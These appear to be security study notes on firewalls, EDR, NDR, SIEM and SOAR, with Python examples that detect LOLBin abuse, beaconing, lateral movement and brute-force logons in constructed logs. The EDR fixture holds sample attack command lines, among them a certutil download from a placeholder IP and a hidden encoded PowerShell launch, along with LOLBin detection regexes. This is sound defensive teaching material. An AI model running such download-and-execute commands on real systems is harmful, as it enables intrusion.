Prevention
Firewalls
Strengths
- Centralized control of network traffic.
- Filters based on IP, port, protocol.
- Network segmentation reduces attack surface.
Limits
- Cannot see malicious activity inside allowed traffic: a permitted flow passes whatever payload it carries.
- Blind to internal (east-west) traffic unless the network is segmented and the segments are firewalled.
- Misconfigurations either block legitimate traffic or leave unintended exposure (overly permissive rules).
Antivirus & EPP
Strengths
- Protects endpoints from known malware.
- Heuristic analysis for variants.
- Centralized management.
Limits
- Signature and heuristic scanning is limited against APTs and fileless malware (nothing on disk to scan).
- Cannot prevent lateral movement alone.
Detection
EDR (Endpoint Detection & Response)
Threat detection based on behavioral analysis of endpoint telemetry (process trees, command lines, actions) rather than signature matching alone.
Capabilities
- Continuous endpoint monitoring (process creation, registry, file and network activity).
- Detects abuse of LOLBins (living-off-the-land binaries such as certutil or mshta) and lateral movement.
- Automated containment (isolate host).
Weaknesses
- Requires agent deployment (gaps if missing).
- Can be evaded or tampered with by advanced attackers (e.g. the agent disabled or blinded), so it is a layer, not a guarantee.
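The behavioral approach above, as an added example that is not part of the original notes: three EDR-style rules run over constructed Sysmon-like process-creation events. None of the rules uses a file hash or signature; they key on how a legitimate binary is invoked (LOLBin arguments), on an unexpected parent/child pair (Office spawning a shell), and on remote-execution parents typical of lateral movement. The host names, command lines and the assumption that WMI is not used for legitimate scripting in this environment are all constructed for the example.

```python
"""Behavioral EDR-style rules over process-creation telemetry (constructed data)."""
import re
from collections import defaultdict

# Constructed Sysmon-like Event ID 1 (process create) records; not real telemetry.
EVENTS = [
    {"host": "WS-01", "ts": 1, "parent": "explorer.exe", "image": "winword.exe",
     "cmdline": 'WINWORD.EXE "C:\\Users\\a\\invoice.docm"'},
    {"host": "WS-01", "ts": 2, "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA..."},
    {"host": "WS-01", "ts": 3, "parent": "powershell.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.7/p.txt C:\\Users\\a\\p.txt"},
    {"host": "SRV-02", "ts": 10, "parent": "wmiprvse.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt"},
    {"host": "WS-03", "ts": 20, "parent": "explorer.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -verify C:\\certs\\corp.cer"},   # legitimate admin use
    {"host": "WS-03", "ts": 21, "parent": "explorer.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe"},
]

# Rule 1: LOLBin abuse. The binary itself is legitimate and signed, so only the
# way it is invoked (download/decode switches, URLs) distinguishes abuse.
LOLBIN_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode", re.I),
    "mshta.exe": re.compile(r"https?://|javascript:|vbscript:", re.I),
    "regsvr32.exe": re.compile(r"/i:https?://|scrobj\.dll", re.I),
    "rundll32.exe": re.compile(r"javascript:|https?://", re.I),
    "bitsadmin.exe": re.compile(r"/transfer|/addfile", re.I),
}

# Rule 2: suspicious parent/child pairs (pure behavior, no signature involved).
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# Rule 3: parents that typically host remote execution (WMI, service creation).
# Assumption for this example: the environment does not run scripts via WMI.
REMOTE_EXEC_PARENTS = {"wmiprvse.exe", "services.exe"}


def evaluate(event):
    """Return a list of (rule_name, severity) findings for one process-create event."""
    findings = []
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmdline"]
    pat = LOLBIN_PATTERNS.get(image)
    if pat and pat.search(cmd):
        findings.append(("lolbin_abuse", "high"))
    if parent in OFFICE and image in SHELLS:
        findings.append(("office_spawns_shell", "high"))
    if parent in REMOTE_EXEC_PARENTS and image in SHELLS:
        findings.append(("remote_exec_lateral_movement", "medium"))
    return findings


def run(events):
    """Evaluate all events; return {host: [(ts, image, rule, severity), ...]}."""
    alerts = defaultdict(list)
    for ev in events:
        for rule, sev in evaluate(ev):
            alerts[ev["host"]].append((ev["ts"], ev["image"], rule, sev))
    return dict(alerts)


def hosts_to_isolate(alerts):
    """Automated containment policy: isolate a host with any 'high' finding,
    or with two or more findings of any severity (a chain, not a one-off)."""
    return sorted(h for h, a in alerts.items()
                  if any(sev == "high" for *_, sev in a) or len(a) >= 2)


if __name__ == "__main__":
    result = run(EVENTS)
    for host, items in result.items():
        for ts, image, rule, sev in items:
            print(f"{host} t={ts} {image}: {rule} [{sev}]")
    print("isolate:", hosts_to_isolate(result))
```

WS-01 is isolated because the Office-to-PowerShell-to-certutil chain produces two high findings; SRV-02 gets a medium alert for an analyst but is not auto-isolated on a single indicator; the certutil -verify call on WS-03 is not flagged. A host with no agent installed would produce no events at all and could never reach hosts_to_isolate, which is the coverage gap noted under Weaknesses.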
NDR (Network Detection & Response)
Monitors east-west traffic and detects anomalies in network flows.
- Detects lateral movement and C2 beaconing.
- Complements EDR where agents can't go (IoT, printers).
- Blind spot: payload inspection of encrypted traffic (without TLS inspection). Flow metadata (timing, volume, ports, peers) stays visible and is what beaconing and fan-out detections use.
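The two NDR detections named above, as an added example not taken from the original notes: beaconing is found from near-constant inter-arrival times of flows to one destination, and lateral movement from one internal host reaching many internal peers on admin ports in a short window. Both use only flow metadata (timestamps, IPs, ports), so they work unchanged on TLS traffic. The flow records, the 10/8 internal range and the thresholds are constructed assumptions for the example.

```python
"""NDR-style analytics over flow metadata (constructed Zeek/NetFlow-like records)."""
import statistics
from collections import defaultdict

INTERNAL = ("10.",)  # assumption: 10/8 is the internal address range

# Constructed flow records: (timestamp_s, src_ip, dst_ip, dst_port).
# No payload is present, so the same analytics apply to encrypted traffic.
FLOWS = []
# A beacon: 60 s call-home with small jitter, TLS to an external host.
for i, jitter in enumerate([0, 1, -1, 2, 0, -2, 1, 0]):
    FLOWS.append((1000 + 60 * i + jitter, "10.0.1.20", "203.0.113.7", 443))
# Ordinary browsing: bursty, irregular timing to an external site.
for t in (1000, 1003, 1004, 1090, 1091, 1300, 1301, 1302):
    FLOWS.append((t, "10.0.1.21", "198.51.100.5", 443))
# Lateral movement: one host fans out over SMB to many internal peers quickly.
for i in range(6):
    FLOWS.append((1400 + 3 * i, "10.0.1.20", f"10.0.2.{10 + i}", 445))


def is_internal(ip):
    return ip.startswith(INTERNAL)


def beacon_candidates(flows, min_flows=6, max_cv=0.15):
    """Flag (src, dst, port) tuples whose inter-arrival times are near-constant.
    cv = stdev/mean of the gaps: a human-driven session has a high cv, a
    timer-driven implant a low one. Returns {(src, dst, port): cv}."""
    groups = defaultdict(list)
    for ts, src, dst, port in flows:
        groups[(src, dst, port)].append(ts)
    out = {}
    for key, times in groups.items():
        if len(times) < min_flows:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        cv = statistics.pstdev(gaps) / statistics.mean(gaps)
        if cv <= max_cv:
            out[key] = round(cv, 3)
    return out


def lateral_fanout(flows, ports=(445, 3389, 5985, 5986), window=60, min_peers=5):
    """Flag internal sources reaching >= min_peers distinct internal hosts on
    admin ports (SMB, RDP, WinRM) within `window` seconds. Returns {src: peers}."""
    by_src = defaultdict(list)
    for ts, src, dst, port in flows:
        if port in ports and is_internal(src) and is_internal(dst):
            by_src[src].append((ts, dst))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            peers = {d for t, d in events[i:] if t - t0 <= window}
            if len(peers) >= min_peers:
                hits[src] = len(peers)
                break
    return hits


if __name__ == "__main__":
    print("beacons:", beacon_candidates(FLOWS))
    print("fan-out:", lateral_fanout(FLOWS))
```

The browsing session has a coefficient of variation well above 1 and is ignored, while the implant's gaps of 58 to 63 seconds give a cv of about 0.04. The thresholds are the tuning knobs a real deployment argues about: real implants add jitter (raise max_cv), and legitimate schedulers also beacon (allow-list known update and telemetry endpoints).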
Management & Orchestration
SIEM
Centralized log management, correlation, and alerting.
Critical Insight
SIEM does not replace endpoint or network monitoring; it only correlates data those sensors have already collected. A source that is not ingested cannot contribute to any alert.
SOAR
Security Orchestration, Automation, and Response.
- Automates repetitive tasks (enrichment, blocking).
- Reduces Mean Time To Respond (MTTR).
- Warning: Requires high-quality detection upstream. Automation amplifies whatever it is fed, so a noisy rule becomes an automated outage. No good input = No good output.
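The SIEM and SOAR points above together, as an added example that is not part of the original notes: a correlation rule joins Windows logon events with an EDR finding on the same host, and a playbook then enriches the alert and gates automated blocking on corroboration from a second source. Running the correlation without the Windows log source ingested shows the Critical Insight directly: no data, no alert. The events, the asset-criticality and service-account lookups, and the action names are constructed assumptions for the example.

```python
"""SIEM-style correlation plus a SOAR-style playbook over constructed logs."""
from collections import defaultdict

# Constructed, already-normalized events from two sources (not real logs).
EVENTS = [
    # five failed logons (4625) from one workstation to a server, a second apart
    {"ts": 100 + i, "source": "windows", "event_id": 4625, "host": "SRV-02",
     "src_ip": "10.0.1.20", "user": "svc_backup"} for i in range(5)
] + [
    # ...then a successful logon (4624) for the same source/host pair
    {"ts": 110, "source": "windows", "event_id": 4624, "host": "SRV-02",
     "src_ip": "10.0.1.20", "user": "svc_backup"},
    # an EDR finding on the same server shortly afterwards
    {"ts": 125, "source": "edr", "host": "SRV-02", "rule": "remote_exec_lateral_movement"},
    # a single mistyped password on another host: not an attack
    {"ts": 130, "source": "windows", "event_id": 4625, "host": "WS-03",
     "src_ip": "10.0.1.21", "user": "alice"},
    {"ts": 131, "source": "windows", "event_id": 4624, "host": "WS-03",
     "src_ip": "10.0.1.21", "user": "alice"},
]


def correlate(events, min_failures=5, window=300):
    """Rule: >= min_failures failed logons (4625) from one src_ip to one host,
    followed by a success (4624) for the same pair within `window` seconds.
    An EDR finding on that host within the window corroborates the alert."""
    failures = defaultdict(list)      # (src_ip, host) -> [ts, ...]
    edr_by_host = defaultdict(list)
    for ev in events:
        if ev["source"] == "edr":
            edr_by_host[ev["host"]].append(ev)
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["source"] != "windows":
            continue
        key = (ev["src_ip"], ev["host"])
        if ev["event_id"] == 4625:
            failures[key].append(ev["ts"])
        elif ev["event_id"] == 4624:
            recent = [t for t in failures[key] if ev["ts"] - t <= window]
            if len(recent) >= min_failures:
                corroborating = [e["rule"] for e in edr_by_host[ev["host"]]
                                 if 0 <= e["ts"] - ev["ts"] <= window]
                alerts.append({"name": "bruteforce_then_success", "host": ev["host"],
                               "src_ip": ev["src_ip"], "user": ev["user"],
                               "failures": len(recent), "edr": corroborating})
            failures[key].clear()
    return alerts


# SOAR side: enrichment lookups (constructed) and an action policy.
ASSET_CRITICALITY = {"SRV-02": "high", "WS-03": "low"}   # assumption: CMDB export
KNOWN_SERVICE_ACCOUNTS = {"svc_backup"}                  # assumption: IAM export


def playbook(alert):
    """Enrich the alert and choose a response. Automated blocking is gated on
    corroboration from a second source, so one noisy rule cannot isolate a
    production host by itself (the 'no good input, no good output' warning)."""
    enriched = dict(alert)
    enriched["criticality"] = ASSET_CRITICALITY.get(alert["host"], "unknown")
    enriched["service_account"] = alert["user"] in KNOWN_SERVICE_ACCOUNTS
    corroborated = bool(alert["edr"])
    if corroborated and enriched["criticality"] == "high":
        enriched["action"] = "isolate_host_and_disable_account"
    elif corroborated:
        enriched["action"] = "isolate_host"
    else:
        enriched["action"] = "open_ticket_for_analyst"
    return enriched


if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(playbook(a))
    # With the Windows source missing, the SIEM has nothing to correlate:
    print(correlate([e for e in EVENTS if e["source"] != "windows"]))
```

One alert fires for SRV-02 (five failures, then success, corroborated by EDR), and the playbook isolates the host and disables the service account; alice's single typo on WS-03 never reaches the playbook. Strip the Windows events and correlate() returns an empty list, which is the SIEM limitation in one line, and an uncorroborated alert only opens a ticket, which is the SOAR warning applied as policy.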